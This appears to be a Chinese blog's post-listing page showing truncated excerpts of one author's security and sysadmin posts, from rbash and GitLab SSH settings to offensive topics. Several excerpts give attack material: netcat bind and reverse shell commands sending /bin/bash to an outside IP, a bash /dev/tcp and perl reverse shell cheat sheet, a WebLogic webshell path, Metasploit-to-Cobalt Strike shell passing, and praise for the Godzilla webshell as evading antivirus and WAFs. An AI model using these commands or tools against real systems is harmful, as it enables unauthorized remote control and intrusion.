2024-12-29 厉飞雨 阅读(104) 评论(0) 赞(9)

在Linux以及类Unix系统中，安全性至关重要，尤其是当多个用户共享一个系统时。其中，增强安全性的一种方法是使用受限[shell](https://51tbox.com/ "shell")，rbash（Restricted Bash）就是这样的一种shell 。 接下来小编将简单介绍什么是rbash，它与常规Bash shell有何不同，并通过使用几个实...

2024-12-29 厉飞雨 阅读(139) 评论(0) 赞(5)

使用效果 在动态加载方式勾选反沙箱之后，结果如下： ![](https://mmbiz.qpic.cn/sz_mmbiz_png/4PzD69su9gVHDwuoQnna9aw1pjmYaR5miaGKrFPsBzwdSAuV5XTr56yTPQvN5dMutIzYvEeVQHpdhQ5QH8icQDKQ/640?wx_fmt=png&tp=webp&wxf...

2024-12-29 厉飞雨 阅读(139) 评论(0) 赞(5)

前言 === 今年hw有点牛批，昨天爆出一堆0day，冰蝎也出了3.0，今天又看到一个哥斯拉，听说比冰蝎还nb(安全性自测，会不会是蓝队放出来的0_0) 哥斯拉优点 ===== * 1哥斯拉全部类型的shell均过市面所有静态查杀(特征随便改改就能继续过) * 2哥斯拉流量加密过市面全部流量waf * 3哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的(看了一下确实香) 项...

2024-12-29 厉飞雨 阅读(150) 评论(0) 赞(6)

前言 === weblogic最近又出境了，小记一波。 路径 === 1、image目录 c:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp shell访问 http://xxxx/con...

2024-12-29 厉飞雨 阅读(121) 评论(0) 赞(7)

前言 === 一般大家都是两款神器结合使用，自然少不了shell之间转换。 msf转cs ====== 首先cs创建一个windows/becon_http/reverse_http的 Listener 再用msf弹shell过去 msf exploit(handler) > use exploit/windows/local/payload_i...

2024-12-29 厉飞雨 阅读(116) 评论(0) 赞(8)

前言 === 刚刚用windows写了个脚本，拿到kali执行发现的问题（还是太垃圾了） 解决 === 用windows系统打开过的文档会被改为dos格式 dos格式：CR LF unix格式：LF 在vim中用\*\*:set ff**查看格式 用** :set ff=unix**和**:set ff=dos\*\*来改变格式

2024-12-29 厉飞雨 阅读(104) 评论(0) 赞(7)

使用 === 正向shell： nc -lvvp 1988 -e /bin/bash nc 10.1.10.2 1988 //攻击鸡 反向shell： nc -e /bin/bash 152.54.56.4 1988 nc -lvvp 1988 //攻击鸡 注...

2024-12-29 厉飞雨 阅读(117) 评论(0) 赞(4)

说明 === 分享一下各种版本的shell写法 bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM...

2024-12-25 厉飞雨 阅读(93) 评论(0) 赞(8)

<h2>1 上传协议插件 {#1-%E4%B8%8A%E4%BC%A0%E5%8D%8F%E8%AE%AE%E6%8F%92%E4%BB%B6}</h2> <p>ssh 协议插件需要在【系统设置-系统-插件】上传插件包，插件在 <a href="https://apps.fit2cloud.com/metersphere/ss...

2024-12-25 厉飞雨 阅读(182) 评论(0) 赞(8)

<p>如果修改了默认ssh的22端口，gitlab则无法使用ssh认证连接，因为在gitlab配置中，默认ssh端口是22.</p> <p>要在gitlab配置中修改成对应的ssh端口号.</p> <p>编辑配置文件<br /> vi /etc/gitlab/gitlab.rb gitlab_rails[&...